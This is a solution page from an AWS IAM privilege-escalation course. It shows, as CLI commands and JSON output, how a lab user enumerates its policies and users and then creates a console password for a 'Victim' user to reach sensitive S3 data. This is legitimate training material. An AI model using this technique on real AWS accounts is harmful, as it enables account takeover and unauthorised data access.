Back to Course

IAM Privilege Escalation Labs

0% Complete
0/0 Steps
  1. Introduction

    About this course
  2. Real-world case studies
  3. Useful IAM tips and security tools
  4. Introduction to AWS Enumeration
    [LAB] Getting Started with the AWS CLI
  5. [LAB] Introduction to AWS IAM Enumeration
  6. [Cheat Sheet] IAM Enumeration CLI Commands
  7. [LAB] Introduction to Secrets Manager Enumeration
  8. [Cheat Sheet] Secrets Manager Enumeration CLI Commands
  9. [LAB] Introduction to Amazon S3 Enumeration
  10. iam:CreateAccessKey
    [LAB] [CTF] iam:CreateAccessKey PrivEsc
  11. iam:CreateAccessKey Solution
  12. iam:CreateLoginProfile
    [LAB] [CTF] iam:CreateLoginProfile PrivEsc
  13. iam:CreateLoginProfile Solution
  14. iam:UpdateLoginProfile
    [LAB] [CTF] iam:UpdateLoginProfile PrivEsc
  15. iam:UpdateLoginProfile Solution
  16. iam:SetDefaultPolicyVersion
    [LAB] [CTF] iam:SetDefaultPolicyVersion PrivEsc
  17. iam:SetDefaultPolicyVersion Solution
  18. iam:AddUserToGroup
    [LAB] [CTF] iam:AddUserToGroup PrivEsc
  19. iam:AddUserToGroup Solution
  20. iam:AttachUserPolicy
    [LAB] [CTF] iam:AttachUserPolicy PrivEsc
  21. iam:AttachUserPolicy Solution
  22. iam:AttachGroupPolicy
    [LAB] [CTF] iam:AttachGroupPolicy PrivEsc
  23. iam:AttachGroupPolicy Solution
  24. iam:PutUserPolicy
    [LAB] [CTF] iam:PutUserPolicy PrivEsc
  25. iam:PutUserPolicy Solution
  26. iam:PutGroupPolicy
    [LAB] [CTF] iam:PutGroupPolicy PrivEsc
  27. iam:PutGroupPolicy Solution
  28. iam:AttachRolePolicy
    [LAB] [CTF] iam:AttachRolePolicy PrivEsc
  29. iam:AttachRolePolicy Solution
  30. iam:PutRolePolicy
    [LAB] [CTF] iam:PutRolePolicy PrivEsc
  31. iam:PutRolePolicy Solution
  32. Challenges
    About challenges
  33. Challenge #1 - Secrets Unleashed
  34. Challenge #2 - IAM Escape Room
  35. Conclusion
    What's next?
Lesson 13 of 35
In Progress

iam:CreateLoginProfile Solution

Christophe November 19, 2023

Using the provided Access Key ID and Secret Access Key, configure your AWS CLI profile. (The use of --profile is optional and simply helps separate credentials on your local machine)

aws configure --profile createlogin

Enumerate your user’s permissions:

aws iam list-groups --profile createlogin
Code language: PHP (php)
{
    "Groups": [
        {
            "Path": "/",
            "GroupName": "iam-createloginprofile-privesc-1701380454738-Developers",
            "GroupId": "AGPA5M7PA4Z5SDKOU4LG7",
            "Arn": "arn:aws:iam::921234892411:group/iam-createloginprofile-privesc-1701380454738-Developers",
            "CreateDate": "2023-11-30T21:41:01+00:00"
        }
    ]
}


Code language: JSON / JSON with Comments (json)

List policies for this group:

aws iam list-group-policies --group-name iam-createloginprofile-privesc-1701380454738-Developers --profile createlogin


Code language: PHP (php)
{
    "PolicyNames": [
        "iam-createloginprofile-privesc-1701380454738-policy"
    ]
}


Code language: JSON / JSON with Comments (json)

Now list the permissions in this policy:

aws iam get-group-policy --group-name iam-createloginprofile-privesc-1701380454738-Developers --policy-name iam-createloginprofile-privesc-1701380454738-policy --profile createlogin


Code language: JavaScript (javascript)
{
    "GroupName": "iam-createloginprofile-privesc-1701380454738-Developers",
    "PolicyName": "iam-createloginprofile-privesc-1701380454738-policy",
    "PolicyDocument": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Action": [
                    "iam:CreateLoginProfile",
                    "iam:ListAccessKeys",
                    "iam:ListAttachedUserPolicies"
                ],
                "Resource": [
                    "arn:aws:iam::921234892411:user/iam-createloginprofile-privesc-1701380454738-Attacker",
                    "arn:aws:iam::921234892411:user/iam-createloginprofile-privesc-1701380454738-Victim"
                ],
                "Effect": "Allow"
            },
            {
                "Action": [
                    "iam:ListGroupPolicies",
                    "iam:ListPolicies",
                    "iam:ListPolicyVersions",
                    "iam:ListUserPolicies",
                    "iam:ListUsers",
                    "iam:ListGroups",
                    "iam:ListGroupsForUser",
                    "iam:GetPolicy",
                    "iam:GetPolicyVersion",
                    "iam:GetRole",
                    "iam:GetRolePolicy",
                    "iam:GetUser",
                    "iam:GetUserPolicy",
                    "iam:GetGroupPolicy"
                ],
                "Resource": "*",
                "Effect": "Allow"
            }
        ]
    }
}


Code language: JSON / JSON with Comments (json)

By viewing your policy, you get quite a bit of information back. Including that you are able to list users in this account:

aws iam list-users --profile createlogin

Code language: PHP (php)
{
    "Users": [
        {
            "Path": "/",
            "UserName": "iam-createloginprofile-privesc-1701380454738-Attacker",
            "UserId": "AIDA5M7PA4Z55NCIDD57K",
            "Arn": "arn:aws:iam::921234892411:user/iam-createloginprofile-privesc-1701380454738-Attacker",
            "CreateDate": "2023-11-30T21:41:01+00:00"
        },
        {
            "Path": "/",
            "UserName": "iam-createloginprofile-privesc-1701380454738-Victim",
            "UserId": "AIDA5M7PA4Z54CRXUYOIV",
            "Arn": "arn:aws:iam::921234892411:user/iam-createloginprofile-privesc-1701380454738-Victim",
            "CreateDate": "2023-11-30T21:41:23+00:00"
        }
    ]
}


Code language: JSON / JSON with Comments (json)

This result gives you 2 critical pieces of information:

  • The username (in my case): iam-createloginprofile-privesc-1701380454738-Attacker
  • The AWS account ID (in my case): 921234892411

Using that, we can run this command:

aws iam create-login-profile --user-name iam-createloginprofile-privesc-1701380454738-Victim --password 'JzreMu8KXF9RvTpb2sSRJqyd5uioMi' --no-password-reset-required --profile createlogin


Code language: JavaScript (javascript)

Which returns:

{
    "LoginProfile": {
        "UserName": "iam-createloginprofile-privesc-1701380454738-Victim",
        "CreateDate": "2023-11-30T21:46:56+00:00",
        "PasswordResetRequired": false
    }
}


Code language: JSON / JSON with Comments (json)

We can now use the username, AWS account ID, and the password we provided, in order to log into the AWS console:

https://signin.aws.amazon.com/signin

From there, you can access Amazon S3 to find a bucket containing sensitive data that you can then download.

Responses

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.